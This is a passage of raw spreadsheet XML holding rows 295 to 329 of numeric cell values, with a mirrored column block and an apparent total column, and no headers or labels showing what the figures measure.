        <v>325</v>
      </c>
      <c r="K295" s="7">
        <v>722</v>
      </c>
      <c r="L295" s="8">
        <v>25</v>
      </c>
      <c r="M295" s="8">
        <v>1</v>
      </c>
      <c r="N295" s="8">
        <v>52</v>
      </c>
      <c r="O295" s="8">
        <v>220</v>
      </c>
      <c r="P295" s="8">
        <v>22</v>
      </c>
      <c r="Q295" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="296" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A296" s="7">
        <v>724</v>
      </c>
      <c r="B296" s="8">
        <v>26</v>
      </c>
      <c r="C296" s="8">
        <v>0</v>
      </c>
      <c r="D296" s="8">
        <v>2</v>
      </c>
      <c r="E296" s="8">
        <v>48</v>
      </c>
      <c r="F296" s="8">
        <v>3</v>
      </c>
      <c r="G296" s="8">
        <v>0</v>
      </c>
      <c r="H296" s="8">
        <v>79</v>
      </c>
      <c r="K296" s="7">
        <v>724</v>
      </c>
      <c r="L296" s="8">
        <v>26</v>
      </c>
      <c r="M296" s="8">
        <v>0</v>
      </c>
      <c r="N296" s="8">
        <v>2</v>
      </c>
      <c r="O296" s="8">
        <v>48</v>
      </c>
      <c r="P296" s="8">
        <v>3</v>
      </c>
      <c r="Q296" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="297" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A297" s="7">
        <v>727</v>
      </c>
      <c r="B297" s="8">
        <v>0</v>
      </c>
      <c r="C297" s="8">
        <v>0</v>
      </c>
      <c r="D297" s="8">
        <v>0</v>
      </c>
      <c r="E297" s="8">
        <v>0</v>
      </c>
      <c r="F297" s="8">
        <v>49</v>
      </c>
      <c r="G297" s="8">
        <v>21</v>
      </c>
      <c r="H297" s="8">
        <v>70</v>
      </c>
      <c r="K297" s="7">
        <v>727</v>
      </c>
      <c r="L297" s="8">
        <v>0</v>
      </c>
      <c r="M297" s="8">
        <v>0</v>
      </c>
      <c r="N297" s="8">
        <v>0</v>
      </c>
      <c r="O297" s="8">
        <v>0</v>
      </c>
      <c r="P297" s="8">
        <v>49</v>
      </c>
      <c r="Q297" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="298" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A298" s="7">
        <v>732</v>
      </c>
      <c r="B298" s="8">
        <v>30</v>
      </c>
      <c r="C298" s="8">
        <v>1</v>
      </c>
      <c r="D298" s="8">
        <v>8</v>
      </c>
      <c r="E298" s="8">
        <v>12</v>
      </c>
      <c r="F298" s="8">
        <v>0</v>
      </c>
      <c r="G298" s="8">
        <v>4</v>
      </c>
      <c r="H298" s="8">
        <v>55</v>
      </c>
      <c r="K298" s="7">
        <v>732</v>
      </c>
      <c r="L298" s="8">
        <v>30</v>
      </c>
      <c r="M298" s="8">
        <v>1</v>
      </c>
      <c r="N298" s="8">
        <v>8</v>
      </c>
      <c r="O298" s="8">
        <v>12</v>
      </c>
      <c r="P298" s="8">
        <v>0</v>
      </c>
      <c r="Q298" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="299" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A299" s="7">
        <v>734</v>
      </c>
      <c r="B299" s="8">
        <v>26</v>
      </c>
      <c r="C299" s="8">
        <v>1</v>
      </c>
      <c r="D299" s="8">
        <v>0</v>
      </c>
      <c r="E299" s="8">
        <v>0</v>
      </c>
      <c r="F299" s="8">
        <v>10</v>
      </c>
      <c r="G299" s="8">
        <v>4</v>
      </c>
      <c r="H299" s="8">
        <v>41</v>
      </c>
      <c r="K299" s="7">
        <v>734</v>
      </c>
      <c r="L299" s="8">
        <v>26</v>
      </c>
      <c r="M299" s="8">
        <v>1</v>
      </c>
      <c r="N299" s="8">
        <v>0</v>
      </c>
      <c r="O299" s="8">
        <v>0</v>
      </c>
      <c r="P299" s="8">
        <v>10</v>
      </c>
      <c r="Q299" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="300" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A300" s="7">
        <v>735</v>
      </c>
      <c r="B300" s="8">
        <v>365</v>
      </c>
      <c r="C300" s="8">
        <v>1</v>
      </c>
      <c r="D300" s="8">
        <v>8</v>
      </c>
      <c r="E300" s="8">
        <v>2</v>
      </c>
      <c r="F300" s="8">
        <v>0</v>
      </c>
      <c r="G300" s="8">
        <v>4</v>
      </c>
      <c r="H300" s="8">
        <v>380</v>
      </c>
      <c r="K300" s="7">
        <v>735</v>
      </c>
      <c r="L300" s="8">
        <v>365</v>
      </c>
      <c r="M300" s="8">
        <v>1</v>
      </c>
      <c r="N300" s="8">
        <v>8</v>
      </c>
      <c r="O300" s="8">
        <v>2</v>
      </c>
      <c r="P300" s="8">
        <v>0</v>
      </c>
      <c r="Q300" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="301" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A301" s="7">
        <v>736</v>
      </c>
      <c r="B301" s="8">
        <v>26</v>
      </c>
      <c r="C301" s="8">
        <v>1</v>
      </c>
      <c r="D301" s="8">
        <v>2</v>
      </c>
      <c r="E301" s="8">
        <v>0</v>
      </c>
      <c r="F301" s="8">
        <v>5</v>
      </c>
      <c r="G301" s="8">
        <v>4</v>
      </c>
      <c r="H301" s="8">
        <v>38</v>
      </c>
      <c r="K301" s="7">
        <v>736</v>
      </c>
      <c r="L301" s="8">
        <v>26</v>
      </c>
      <c r="M301" s="8">
        <v>1</v>
      </c>
      <c r="N301" s="8">
        <v>2</v>
      </c>
      <c r="O301" s="8">
        <v>0</v>
      </c>
      <c r="P301" s="8">
        <v>5</v>
      </c>
      <c r="Q301" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="302" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A302" s="7">
        <v>737</v>
      </c>
      <c r="B302" s="8">
        <v>25</v>
      </c>
      <c r="C302" s="8">
        <v>1</v>
      </c>
      <c r="D302" s="8">
        <v>0</v>
      </c>
      <c r="E302" s="8">
        <v>0</v>
      </c>
      <c r="F302" s="8">
        <v>26</v>
      </c>
      <c r="G302" s="8">
        <v>29</v>
      </c>
      <c r="H302" s="8">
        <v>81</v>
      </c>
      <c r="K302" s="7">
        <v>737</v>
      </c>
      <c r="L302" s="8">
        <v>25</v>
      </c>
      <c r="M302" s="8">
        <v>1</v>
      </c>
      <c r="N302" s="8">
        <v>0</v>
      </c>
      <c r="O302" s="8">
        <v>0</v>
      </c>
      <c r="P302" s="8">
        <v>26</v>
      </c>
      <c r="Q302" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="303" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A303" s="7">
        <v>738</v>
      </c>
      <c r="B303" s="8">
        <v>8</v>
      </c>
      <c r="C303" s="8">
        <v>1</v>
      </c>
      <c r="D303" s="8">
        <v>0</v>
      </c>
      <c r="E303" s="8">
        <v>0</v>
      </c>
      <c r="F303" s="8">
        <v>31</v>
      </c>
      <c r="G303" s="8">
        <v>8</v>
      </c>
      <c r="H303" s="8">
        <v>48</v>
      </c>
      <c r="K303" s="7">
        <v>738</v>
      </c>
      <c r="L303" s="8">
        <v>8</v>
      </c>
      <c r="M303" s="8">
        <v>1</v>
      </c>
      <c r="N303" s="8">
        <v>0</v>
      </c>
      <c r="O303" s="8">
        <v>0</v>
      </c>
      <c r="P303" s="8">
        <v>31</v>
      </c>
      <c r="Q303" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="304" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A304" s="7">
        <v>739</v>
      </c>
      <c r="B304" s="8">
        <v>24</v>
      </c>
      <c r="C304" s="8">
        <v>2</v>
      </c>
      <c r="D304" s="8">
        <v>100</v>
      </c>
      <c r="E304" s="8">
        <v>164</v>
      </c>
      <c r="F304" s="8">
        <v>120</v>
      </c>
      <c r="G304" s="8">
        <v>220</v>
      </c>
      <c r="H304" s="8">
        <v>630</v>
      </c>
      <c r="K304" s="7">
        <v>739</v>
      </c>
      <c r="L304" s="8">
        <v>24</v>
      </c>
      <c r="M304" s="8">
        <v>2</v>
      </c>
      <c r="N304" s="8">
        <v>100</v>
      </c>
      <c r="O304" s="8">
        <v>164</v>
      </c>
      <c r="P304" s="8">
        <v>120</v>
      </c>
      <c r="Q304" s="8">
        <v>220</v>
      </c>
    </row>
    <row r="305" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A305" s="7">
        <v>743</v>
      </c>
      <c r="B305" s="8">
        <v>26</v>
      </c>
      <c r="C305" s="8">
        <v>1</v>
      </c>
      <c r="D305" s="8">
        <v>32</v>
      </c>
      <c r="E305" s="8">
        <v>23</v>
      </c>
      <c r="F305" s="8">
        <v>6</v>
      </c>
      <c r="G305" s="8">
        <v>7</v>
      </c>
      <c r="H305" s="8">
        <v>95</v>
      </c>
      <c r="K305" s="7">
        <v>743</v>
      </c>
      <c r="L305" s="8">
        <v>26</v>
      </c>
      <c r="M305" s="8">
        <v>1</v>
      </c>
      <c r="N305" s="8">
        <v>32</v>
      </c>
      <c r="O305" s="8">
        <v>23</v>
      </c>
      <c r="P305" s="8">
        <v>6</v>
      </c>
      <c r="Q305" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="306" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A306" s="7">
        <v>746</v>
      </c>
      <c r="B306" s="8">
        <v>26</v>
      </c>
      <c r="C306" s="8">
        <v>1</v>
      </c>
      <c r="D306" s="8">
        <v>22</v>
      </c>
      <c r="E306" s="8">
        <v>10</v>
      </c>
      <c r="F306" s="8">
        <v>4</v>
      </c>
      <c r="G306" s="8">
        <v>1</v>
      </c>
      <c r="H306" s="8">
        <v>64</v>
      </c>
      <c r="K306" s="7">
        <v>746</v>
      </c>
      <c r="L306" s="8">
        <v>26</v>
      </c>
      <c r="M306" s="8">
        <v>1</v>
      </c>
      <c r="N306" s="8">
        <v>22</v>
      </c>
      <c r="O306" s="8">
        <v>10</v>
      </c>
      <c r="P306" s="8">
        <v>4</v>
      </c>
      <c r="Q306" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="307" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A307" s="7">
        <v>750</v>
      </c>
      <c r="B307" s="8">
        <v>50</v>
      </c>
      <c r="C307" s="8">
        <v>0</v>
      </c>
      <c r="D307" s="8">
        <v>0</v>
      </c>
      <c r="E307" s="8">
        <v>0</v>
      </c>
      <c r="F307" s="8">
        <v>9</v>
      </c>
      <c r="G307" s="8">
        <v>2</v>
      </c>
      <c r="H307" s="8">
        <v>61</v>
      </c>
      <c r="K307" s="7">
        <v>750</v>
      </c>
      <c r="L307" s="8">
        <v>50</v>
      </c>
      <c r="M307" s="8">
        <v>0</v>
      </c>
      <c r="N307" s="8">
        <v>0</v>
      </c>
      <c r="O307" s="8">
        <v>0</v>
      </c>
      <c r="P307" s="8">
        <v>9</v>
      </c>
      <c r="Q307" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="308" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A308" s="7">
        <v>755</v>
      </c>
      <c r="B308" s="8">
        <v>26</v>
      </c>
      <c r="C308" s="8">
        <v>1</v>
      </c>
      <c r="D308" s="8">
        <v>0</v>
      </c>
      <c r="E308" s="8">
        <v>0</v>
      </c>
      <c r="F308" s="8">
        <v>13</v>
      </c>
      <c r="G308" s="8">
        <v>1</v>
      </c>
      <c r="H308" s="8">
        <v>41</v>
      </c>
      <c r="K308" s="7">
        <v>755</v>
      </c>
      <c r="L308" s="8">
        <v>26</v>
      </c>
      <c r="M308" s="8">
        <v>1</v>
      </c>
      <c r="N308" s="8">
        <v>0</v>
      </c>
      <c r="O308" s="8">
        <v>0</v>
      </c>
      <c r="P308" s="8">
        <v>13</v>
      </c>
      <c r="Q308" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="309" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A309" s="7">
        <v>756</v>
      </c>
      <c r="B309" s="8">
        <v>25</v>
      </c>
      <c r="C309" s="8">
        <v>1</v>
      </c>
      <c r="D309" s="8">
        <v>1</v>
      </c>
      <c r="E309" s="8">
        <v>0</v>
      </c>
      <c r="F309" s="8">
        <v>4</v>
      </c>
      <c r="G309" s="8">
        <v>0</v>
      </c>
      <c r="H309" s="8">
        <v>31</v>
      </c>
      <c r="K309" s="7">
        <v>756</v>
      </c>
      <c r="L309" s="8">
        <v>25</v>
      </c>
      <c r="M309" s="8">
        <v>1</v>
      </c>
      <c r="N309" s="8">
        <v>1</v>
      </c>
      <c r="O309" s="8">
        <v>0</v>
      </c>
      <c r="P309" s="8">
        <v>4</v>
      </c>
      <c r="Q309" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="310" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A310" s="7">
        <v>757</v>
      </c>
      <c r="B310" s="8">
        <v>25</v>
      </c>
      <c r="C310" s="8">
        <v>0</v>
      </c>
      <c r="D310" s="8">
        <v>3</v>
      </c>
      <c r="E310" s="8">
        <v>2</v>
      </c>
      <c r="F310" s="8">
        <v>3</v>
      </c>
      <c r="G310" s="8">
        <v>0</v>
      </c>
      <c r="H310" s="8">
        <v>33</v>
      </c>
      <c r="K310" s="7">
        <v>757</v>
      </c>
      <c r="L310" s="8">
        <v>25</v>
      </c>
      <c r="M310" s="8">
        <v>0</v>
      </c>
      <c r="N310" s="8">
        <v>3</v>
      </c>
      <c r="O310" s="8">
        <v>2</v>
      </c>
      <c r="P310" s="8">
        <v>3</v>
      </c>
      <c r="Q310" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="311" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A311" s="7">
        <v>758</v>
      </c>
      <c r="B311" s="8">
        <v>25</v>
      </c>
      <c r="C311" s="8">
        <v>1</v>
      </c>
      <c r="D311" s="8">
        <v>1</v>
      </c>
      <c r="E311" s="8">
        <v>15</v>
      </c>
      <c r="F311" s="8">
        <v>8</v>
      </c>
      <c r="G311" s="8">
        <v>1</v>
      </c>
      <c r="H311" s="8">
        <v>51</v>
      </c>
      <c r="K311" s="7">
        <v>758</v>
      </c>
      <c r="L311" s="8">
        <v>25</v>
      </c>
      <c r="M311" s="8">
        <v>1</v>
      </c>
      <c r="N311" s="8">
        <v>1</v>
      </c>
      <c r="O311" s="8">
        <v>15</v>
      </c>
      <c r="P311" s="8">
        <v>8</v>
      </c>
      <c r="Q311" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="312" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A312" s="7">
        <v>759</v>
      </c>
      <c r="B312" s="8">
        <v>25</v>
      </c>
      <c r="C312" s="8">
        <v>1</v>
      </c>
      <c r="D312" s="8">
        <v>0</v>
      </c>
      <c r="E312" s="8">
        <v>0</v>
      </c>
      <c r="F312" s="8">
        <v>9</v>
      </c>
      <c r="G312" s="8">
        <v>0</v>
      </c>
      <c r="H312" s="8">
        <v>35</v>
      </c>
      <c r="K312" s="7">
        <v>759</v>
      </c>
      <c r="L312" s="8">
        <v>25</v>
      </c>
      <c r="M312" s="8">
        <v>1</v>
      </c>
      <c r="N312" s="8">
        <v>0</v>
      </c>
      <c r="O312" s="8">
        <v>0</v>
      </c>
      <c r="P312" s="8">
        <v>9</v>
      </c>
      <c r="Q312" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="313" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A313" s="7">
        <v>760</v>
      </c>
      <c r="B313" s="8">
        <v>25</v>
      </c>
      <c r="C313" s="8">
        <v>0</v>
      </c>
      <c r="D313" s="8">
        <v>3</v>
      </c>
      <c r="E313" s="8">
        <v>13</v>
      </c>
      <c r="F313" s="8">
        <v>5</v>
      </c>
      <c r="G313" s="8">
        <v>10</v>
      </c>
      <c r="H313" s="8">
        <v>56</v>
      </c>
      <c r="K313" s="7">
        <v>760</v>
      </c>
      <c r="L313" s="8">
        <v>25</v>
      </c>
      <c r="M313" s="8">
        <v>0</v>
      </c>
      <c r="N313" s="8">
        <v>3</v>
      </c>
      <c r="O313" s="8">
        <v>13</v>
      </c>
      <c r="P313" s="8">
        <v>5</v>
      </c>
      <c r="Q313" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="314" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A314" s="7">
        <v>761</v>
      </c>
      <c r="B314" s="8">
        <v>10</v>
      </c>
      <c r="C314" s="8">
        <v>2</v>
      </c>
      <c r="D314" s="8">
        <v>0</v>
      </c>
      <c r="E314" s="8">
        <v>0</v>
      </c>
      <c r="F314" s="8">
        <v>5</v>
      </c>
      <c r="G314" s="8">
        <v>1</v>
      </c>
      <c r="H314" s="8">
        <v>18</v>
      </c>
      <c r="K314" s="7">
        <v>761</v>
      </c>
      <c r="L314" s="8">
        <v>10</v>
      </c>
      <c r="M314" s="8">
        <v>2</v>
      </c>
      <c r="N314" s="8">
        <v>0</v>
      </c>
      <c r="O314" s="8">
        <v>0</v>
      </c>
      <c r="P314" s="8">
        <v>5</v>
      </c>
      <c r="Q314" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="315" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A315" s="7">
        <v>764</v>
      </c>
      <c r="B315" s="8">
        <v>25</v>
      </c>
      <c r="C315" s="8">
        <v>2</v>
      </c>
      <c r="D315" s="8">
        <v>49</v>
      </c>
      <c r="E315" s="8">
        <v>53</v>
      </c>
      <c r="F315" s="8">
        <v>10</v>
      </c>
      <c r="G315" s="8">
        <v>9</v>
      </c>
      <c r="H315" s="8">
        <v>148</v>
      </c>
      <c r="K315" s="7">
        <v>764</v>
      </c>
      <c r="L315" s="8">
        <v>25</v>
      </c>
      <c r="M315" s="8">
        <v>2</v>
      </c>
      <c r="N315" s="8">
        <v>49</v>
      </c>
      <c r="O315" s="8">
        <v>53</v>
      </c>
      <c r="P315" s="8">
        <v>10</v>
      </c>
      <c r="Q315" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="316" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A316" s="7">
        <v>766</v>
      </c>
      <c r="B316" s="8">
        <v>25</v>
      </c>
      <c r="C316" s="8">
        <v>0</v>
      </c>
      <c r="D316" s="8">
        <v>50</v>
      </c>
      <c r="E316" s="8">
        <v>204</v>
      </c>
      <c r="F316" s="8">
        <v>13</v>
      </c>
      <c r="G316" s="8">
        <v>10</v>
      </c>
      <c r="H316" s="8">
        <v>302</v>
      </c>
      <c r="K316" s="7">
        <v>766</v>
      </c>
      <c r="L316" s="8">
        <v>25</v>
      </c>
      <c r="M316" s="8">
        <v>0</v>
      </c>
      <c r="N316" s="8">
        <v>50</v>
      </c>
      <c r="O316" s="8">
        <v>204</v>
      </c>
      <c r="P316" s="8">
        <v>13</v>
      </c>
      <c r="Q316" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="317" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A317" s="7">
        <v>768</v>
      </c>
      <c r="B317" s="8">
        <v>0</v>
      </c>
      <c r="C317" s="8">
        <v>0</v>
      </c>
      <c r="D317" s="8">
        <v>0</v>
      </c>
      <c r="E317" s="8">
        <v>0</v>
      </c>
      <c r="F317" s="8">
        <v>2</v>
      </c>
      <c r="G317" s="8">
        <v>4</v>
      </c>
      <c r="H317" s="8">
        <v>6</v>
      </c>
      <c r="K317" s="7">
        <v>768</v>
      </c>
      <c r="L317" s="8">
        <v>0</v>
      </c>
      <c r="M317" s="8">
        <v>0</v>
      </c>
      <c r="N317" s="8">
        <v>0</v>
      </c>
      <c r="O317" s="8">
        <v>0</v>
      </c>
      <c r="P317" s="8">
        <v>2</v>
      </c>
      <c r="Q317" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="318" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A318" s="7">
        <v>769</v>
      </c>
      <c r="B318" s="8">
        <v>26</v>
      </c>
      <c r="C318" s="8">
        <v>1</v>
      </c>
      <c r="D318" s="8">
        <v>147</v>
      </c>
      <c r="E318" s="8">
        <v>336</v>
      </c>
      <c r="F318" s="8">
        <v>47</v>
      </c>
      <c r="G318" s="8">
        <v>16</v>
      </c>
      <c r="H318" s="8">
        <v>573</v>
      </c>
      <c r="K318" s="7">
        <v>769</v>
      </c>
      <c r="L318" s="8">
        <v>26</v>
      </c>
      <c r="M318" s="8">
        <v>1</v>
      </c>
      <c r="N318" s="8">
        <v>147</v>
      </c>
      <c r="O318" s="8">
        <v>336</v>
      </c>
      <c r="P318" s="8">
        <v>47</v>
      </c>
      <c r="Q318" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="319" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A319" s="7">
        <v>771</v>
      </c>
      <c r="B319" s="8">
        <v>26</v>
      </c>
      <c r="C319" s="8">
        <v>1</v>
      </c>
      <c r="D319" s="8">
        <v>15</v>
      </c>
      <c r="E319" s="8">
        <v>2</v>
      </c>
      <c r="F319" s="8">
        <v>2</v>
      </c>
      <c r="G319" s="8">
        <v>2</v>
      </c>
      <c r="H319" s="8">
        <v>48</v>
      </c>
      <c r="K319" s="7">
        <v>771</v>
      </c>
      <c r="L319" s="8">
        <v>26</v>
      </c>
      <c r="M319" s="8">
        <v>1</v>
      </c>
      <c r="N319" s="8">
        <v>15</v>
      </c>
      <c r="O319" s="8">
        <v>2</v>
      </c>
      <c r="P319" s="8">
        <v>2</v>
      </c>
      <c r="Q319" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="320" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A320" s="7">
        <v>773</v>
      </c>
      <c r="B320" s="8">
        <v>23</v>
      </c>
      <c r="C320" s="8">
        <v>1</v>
      </c>
      <c r="D320" s="8">
        <v>0</v>
      </c>
      <c r="E320" s="8">
        <v>0</v>
      </c>
      <c r="F320" s="8">
        <v>12</v>
      </c>
      <c r="G320" s="8">
        <v>4</v>
      </c>
      <c r="H320" s="8">
        <v>40</v>
      </c>
      <c r="K320" s="7">
        <v>773</v>
      </c>
      <c r="L320" s="8">
        <v>23</v>
      </c>
      <c r="M320" s="8">
        <v>1</v>
      </c>
      <c r="N320" s="8">
        <v>0</v>
      </c>
      <c r="O320" s="8">
        <v>0</v>
      </c>
      <c r="P320" s="8">
        <v>12</v>
      </c>
      <c r="Q320" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="321" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A321" s="7">
        <v>775</v>
      </c>
      <c r="B321" s="8">
        <v>6</v>
      </c>
      <c r="C321" s="8">
        <v>1</v>
      </c>
      <c r="D321" s="8">
        <v>9</v>
      </c>
      <c r="E321" s="8">
        <v>30</v>
      </c>
      <c r="F321" s="8">
        <v>30</v>
      </c>
      <c r="G321" s="8">
        <v>21</v>
      </c>
      <c r="H321" s="8">
        <v>97</v>
      </c>
      <c r="K321" s="7">
        <v>775</v>
      </c>
      <c r="L321" s="8">
        <v>6</v>
      </c>
      <c r="M321" s="8">
        <v>1</v>
      </c>
      <c r="N321" s="8">
        <v>9</v>
      </c>
      <c r="O321" s="8">
        <v>30</v>
      </c>
      <c r="P321" s="8">
        <v>30</v>
      </c>
      <c r="Q321" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="322" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A322" s="7">
        <v>776</v>
      </c>
      <c r="B322" s="8">
        <v>30</v>
      </c>
      <c r="C322" s="8">
        <v>0</v>
      </c>
      <c r="D322" s="8">
        <v>10</v>
      </c>
      <c r="E322" s="8">
        <v>20</v>
      </c>
      <c r="F322" s="8">
        <v>13</v>
      </c>
      <c r="G322" s="8">
        <v>20</v>
      </c>
      <c r="H322" s="8">
        <v>93</v>
      </c>
      <c r="K322" s="7">
        <v>776</v>
      </c>
      <c r="L322" s="8">
        <v>30</v>
      </c>
      <c r="M322" s="8">
        <v>0</v>
      </c>
      <c r="N322" s="8">
        <v>10</v>
      </c>
      <c r="O322" s="8">
        <v>20</v>
      </c>
      <c r="P322" s="8">
        <v>13</v>
      </c>
      <c r="Q322" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="323" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A323" s="7">
        <v>777</v>
      </c>
      <c r="B323" s="8">
        <v>0</v>
      </c>
      <c r="C323" s="8">
        <v>0</v>
      </c>
      <c r="D323" s="8">
        <v>0</v>
      </c>
      <c r="E323" s="8">
        <v>25</v>
      </c>
      <c r="F323" s="8">
        <v>5</v>
      </c>
      <c r="G323" s="8">
        <v>0</v>
      </c>
      <c r="H323" s="8">
        <v>30</v>
      </c>
      <c r="K323" s="7">
        <v>777</v>
      </c>
      <c r="L323" s="8">
        <v>0</v>
      </c>
      <c r="M323" s="8">
        <v>0</v>
      </c>
      <c r="N323" s="8">
        <v>0</v>
      </c>
      <c r="O323" s="8">
        <v>25</v>
      </c>
      <c r="P323" s="8">
        <v>5</v>
      </c>
      <c r="Q323" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="324" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A324" s="7">
        <v>779</v>
      </c>
      <c r="B324" s="8">
        <v>5</v>
      </c>
      <c r="C324" s="8">
        <v>1</v>
      </c>
      <c r="D324" s="8">
        <v>0</v>
      </c>
      <c r="E324" s="8">
        <v>0</v>
      </c>
      <c r="F324" s="8">
        <v>7</v>
      </c>
      <c r="G324" s="8">
        <v>3</v>
      </c>
      <c r="H324" s="8">
        <v>16</v>
      </c>
      <c r="K324" s="7">
        <v>779</v>
      </c>
      <c r="L324" s="8">
        <v>5</v>
      </c>
      <c r="M324" s="8">
        <v>1</v>
      </c>
      <c r="N324" s="8">
        <v>0</v>
      </c>
      <c r="O324" s="8">
        <v>0</v>
      </c>
      <c r="P324" s="8">
        <v>7</v>
      </c>
      <c r="Q324" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="325" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A325" s="7">
        <v>782</v>
      </c>
      <c r="B325" s="8">
        <v>0</v>
      </c>
      <c r="C325" s="8">
        <v>0</v>
      </c>
      <c r="D325" s="8">
        <v>0</v>
      </c>
      <c r="E325" s="8">
        <v>0</v>
      </c>
      <c r="F325" s="8">
        <v>7</v>
      </c>
      <c r="G325" s="8">
        <v>3</v>
      </c>
      <c r="H325" s="8">
        <v>10</v>
      </c>
      <c r="K325" s="7">
        <v>782</v>
      </c>
      <c r="L325" s="8">
        <v>0</v>
      </c>
      <c r="M325" s="8">
        <v>0</v>
      </c>
      <c r="N325" s="8">
        <v>0</v>
      </c>
      <c r="O325" s="8">
        <v>0</v>
      </c>
      <c r="P325" s="8">
        <v>7</v>
      </c>
      <c r="Q325" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="326" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A326" s="7">
        <v>784</v>
      </c>
      <c r="B326" s="8">
        <v>25</v>
      </c>
      <c r="C326" s="8">
        <v>0</v>
      </c>
      <c r="D326" s="8">
        <v>15</v>
      </c>
      <c r="E326" s="8">
        <v>1</v>
      </c>
      <c r="F326" s="8">
        <v>4</v>
      </c>
      <c r="G326" s="8">
        <v>0</v>
      </c>
      <c r="H326" s="8">
        <v>45</v>
      </c>
      <c r="K326" s="7">
        <v>784</v>
      </c>
      <c r="L326" s="8">
        <v>25</v>
      </c>
      <c r="M326" s="8">
        <v>0</v>
      </c>
      <c r="N326" s="8">
        <v>15</v>
      </c>
      <c r="O326" s="8">
        <v>1</v>
      </c>
      <c r="P326" s="8">
        <v>4</v>
      </c>
      <c r="Q326" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="327" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A327" s="7">
        <v>791</v>
      </c>
      <c r="B327" s="8">
        <v>6</v>
      </c>
      <c r="C327" s="8">
        <v>1</v>
      </c>
      <c r="D327" s="8">
        <v>10</v>
      </c>
      <c r="E327" s="8">
        <v>20</v>
      </c>
      <c r="F327" s="8">
        <v>5</v>
      </c>
      <c r="G327" s="8">
        <v>2</v>
      </c>
      <c r="H327" s="8">
        <v>44</v>
      </c>
      <c r="K327" s="7">
        <v>791</v>
      </c>
      <c r="L327" s="8">
        <v>6</v>
      </c>
      <c r="M327" s="8">
        <v>1</v>
      </c>
      <c r="N327" s="8">
        <v>10</v>
      </c>
      <c r="O327" s="8">
        <v>20</v>
      </c>
      <c r="P327" s="8">
        <v>5</v>
      </c>
      <c r="Q327" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="328" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A328" s="7">
        <v>792</v>
      </c>
      <c r="B328" s="8">
        <v>25</v>
      </c>
      <c r="C328" s="8">
        <v>0</v>
      </c>
      <c r="D328" s="8">
        <v>2</v>
      </c>
      <c r="E328" s="8">
        <v>0</v>
      </c>
      <c r="F328" s="8">
        <v>4</v>
      </c>
      <c r="G328" s="8">
        <v>2</v>
      </c>
      <c r="H328" s="8">
        <v>33</v>
      </c>
      <c r="K328" s="7">
        <v>792</v>
      </c>
      <c r="L328" s="8">
        <v>25</v>
      </c>
      <c r="M328" s="8">
        <v>0</v>
      </c>
      <c r="N328" s="8">
        <v>2</v>
      </c>
      <c r="O328" s="8">
        <v>0</v>
      </c>
      <c r="P328" s="8">
        <v>4</v>
      </c>
      <c r="Q328" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="329" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A329" s="7">
        <v>794</v>
      </c>
      <c r="B329" s="8">
        <v>26</v>
      </c>
      <c r="C329" s="8">
        <v>2</v>
      </c>
      <c r="D329" s="8">
        <v>25</v>
      </c>
      <c r="E329" s="8">
        <v>32</v>
      </c>
      <c r="F329" s="8">
        <v>3</v>
      </c>
      <c r="G329" s="8">
        <v>3</v>
      </c>
      <c r="H329" s="8">
